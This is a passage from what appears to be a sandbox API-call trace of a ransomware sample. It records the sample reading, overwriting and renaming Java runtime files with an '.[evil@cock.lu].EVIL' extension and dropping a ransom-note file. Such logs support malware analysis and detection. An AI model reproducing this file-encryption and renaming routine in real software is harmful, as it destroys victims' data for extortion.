SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.040] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x7fc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7fc0, lpOverlapped=0x0) returned 1 [0097.040] CloseHandle (hObject=0x1a8) returned 1 [0097.040] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.040] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.040] __uncaught_exception () returned 0x84b1160800 [0097.040] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.041] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar.[evil@cock.lu].evil")) returned 1 [0097.042] ??_V@YAXPEAX@Z () returned 0x1 [0097.045] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar", dwFileAttributes=0x0) returned 0 [0097.045] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.045] wcsstr (_Str="sunpkcs11.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.045] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar") returned 57 [0097.045] wcscmp (_String1="sunpkcs11.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.045] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sunpkcs11.jar") returned 0x0 [0097.045] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar") returned 0x39 [0097.045] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.048] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d5bf, lpOverlapped=0x0) returned 1 [0097.052] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.052] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.052] _errno () returned 0x84b1160840 [0097.052] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.052] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x3d5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3d5c0, lpOverlapped=0x0) returned 1 [0097.053] CloseHandle (hObject=0x1a8) returned 1 [0097.053] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.053] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.054] __uncaught_exception () returned 0x84b1160800 [0097.054] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.054] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar.[evil@cock.lu].evil")) returned 1 [0097.054] ??_V@YAXPEAX@Z () returned 0x1 [0097.058] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar", dwFileAttributes=0x0) returned 0 [0097.058] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.058] wcsstr (_Str="zipfs.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.058] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar") returned 53 [0097.058] wcscmp (_String1="zipfs.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.058] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="zipfs.jar") returned 0x0 [0097.058] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar") returned 0x35 [0097.058] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.060] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10d3c, lpOverlapped=0x0) returned 1 [0097.063] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.064] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.064] _errno () returned 0x84b1160840 [0097.064] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.064] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x10d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10d40, lpOverlapped=0x0) returned 1 [0097.064] CloseHandle (hObject=0x1a8) returned 1 [0097.064] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.064] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.064] __uncaught_exception () returned 0x84b1160800 [0097.064] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.065] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\zipfs.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\ext\\zipfs.jar.[evil@cock.lu].evil")) returned 1 [0097.065] ??_V@YAXPEAX@Z () returned 0x1 [0097.068] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar", dwFileAttributes=0x0) returned 0 [0097.069] FindNextFileW (in: hFindFile=0x84b11dd920, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0097.069] FindClose (in: hFindFile=0x84b11dd920 | out: hFindFile=0x84b11dd920) returned 1 [0097.069] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext") returned 0x2b [0097.069] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.069] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.069] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.070] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0097.070] __uncaught_exception () returned 0x84b1160800 [0097.070] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.070] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.070] wcsstr (_Str="flavormap.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.070] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties") returned 60 [0097.070] wcscmp (_String1="flavormap.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.070] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="flavormap.properties") returned 0x0 [0097.070] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties") returned 0x3c [0097.071] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\flavormap.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.093] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xf58, lpOverlapped=0x0) returned 1 [0097.096] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.096] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.097] _errno () returned 0x84b1160840 [0097.097] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.097] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xf60, lpOverlapped=0x0) returned 1 [0097.097] CloseHandle (hObject=0x1a4) returned 1 [0097.097] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.097] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.097] __uncaught_exception () returned 0x84b1160800 [0097.097] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.098] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\flavormap.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\flavormap.properties.[evil@cock.lu].evil")) returned 1 [0097.098] ??_V@YAXPEAX@Z () returned 0x1 [0097.101] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties", dwFileAttributes=0x0) returned 0 [0097.102] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.102] wcsstr (_Str="fontconfig.bfc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.102] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc") returned 54 [0097.102] wcscmp (_String1="fontconfig.bfc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.102] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="fontconfig.bfc") returned 0x0 [0097.102] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc") returned 0x36 [0097.102] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fontconfig.bfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.104] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xeba, lpOverlapped=0x0) returned 1 [0097.107] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.107] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.107] _errno () returned 0x84b1160840 [0097.107] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.107] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xec0, lpOverlapped=0x0) returned 1 [0097.107] CloseHandle (hObject=0x1a4) returned 1 [0097.108] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.108] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.108] __uncaught_exception () returned 0x84b1160800 [0097.108] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.108] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fontconfig.bfc"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fontconfig.bfc.[evil@cock.lu].evil")) returned 1 [0097.109] ??_V@YAXPEAX@Z () returned 0x1 [0097.112] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc", dwFileAttributes=0x0) returned 0 [0097.112] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.112] wcsstr (_Str="fontconfig.properties.src", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.112] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src") returned 65 [0097.112] wcscmp (_String1="fontconfig.properties.src", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.112] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="fontconfig.properties.src") returned 0x0 [0097.112] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src") returned 0x41 [0097.112] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fontconfig.properties.src"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.115] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2948, lpOverlapped=0x0) returned 1 [0097.118] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.118] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.118] _errno () returned 0x84b1160840 [0097.118] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.118] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2960, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2960, lpOverlapped=0x0) returned 1 [0097.118] CloseHandle (hObject=0x1a4) returned 1 [0097.118] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.119] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.119] __uncaught_exception () returned 0x84b1160800 [0097.119] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.119] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fontconfig.properties.src"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fontconfig.properties.src.[evil@cock.lu].evil")) returned 1 [0097.120] ??_V@YAXPEAX@Z () returned 0x1 [0097.123] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src", dwFileAttributes=0x0) returned 0 [0097.123] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.123] wcsstr (_Str="fonts", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.123] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts") returned 45 [0097.123] wcscmp (_String1=".", _String2="fonts") returned -1 [0097.123] wcscmp (_String1="..", _String2="fonts") returned -1 [0097.123] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts") returned 0x2d [0097.123] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts") returned 0x0 [0097.123] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\*" [0097.123] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dda40 [0097.127] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\.") returned 47 [0097.127] wcscmp (_String1=".", _String2=".") returned 0 [0097.127] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.127] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\..") returned 48 [0097.127] wcscmp (_String1=".", _String2="..") returned -1 [0097.127] wcscmp (_String1="..", _String2="..") returned 0 [0097.127] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.127] wcsstr (_Str="LucidaBrightDemiBold.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 70 [0097.127] wcscmp (_String1="LucidaBrightDemiBold.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaBrightDemiBold.ttf") returned 0x0 [0097.127] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 0x46 [0097.127] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.129] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12588, lpOverlapped=0x0) returned 1 [0097.132] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.132] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.132] _errno () returned 0x84b1160840 [0097.133] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.133] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x125a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x125a0, lpOverlapped=0x0) returned 1 [0097.133] CloseHandle (hObject=0x1a8) returned 1 [0097.133] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.133] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.133] __uncaught_exception () returned 0x84b1160800 [0097.133] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.134] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightdemibold.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightdemibold.ttf.[evil@cock.lu].evil")) returned 1 [0097.134] ??_V@YAXPEAX@Z () returned 0x1 [0097.138] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf", dwFileAttributes=0x0) returned 0 [0097.138] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.138] wcsstr (_Str="LucidaBrightDemiItalic.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.138] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 72 [0097.138] wcscmp (_String1="LucidaBrightDemiItalic.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.138] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaBrightDemiItalic.ttf") returned 0x0 [0097.138] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf") returned 0x48 [0097.138] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.140] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12574, lpOverlapped=0x0) returned 1 [0097.144] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.144] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.144] _errno () returned 0x84b1160840 [0097.144] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.144] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x12580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12580, lpOverlapped=0x0) returned 1 [0097.144] CloseHandle (hObject=0x1a8) returned 1 [0097.144] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.145] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.145] __uncaught_exception () returned 0x84b1160800 [0097.145] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.145] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf" 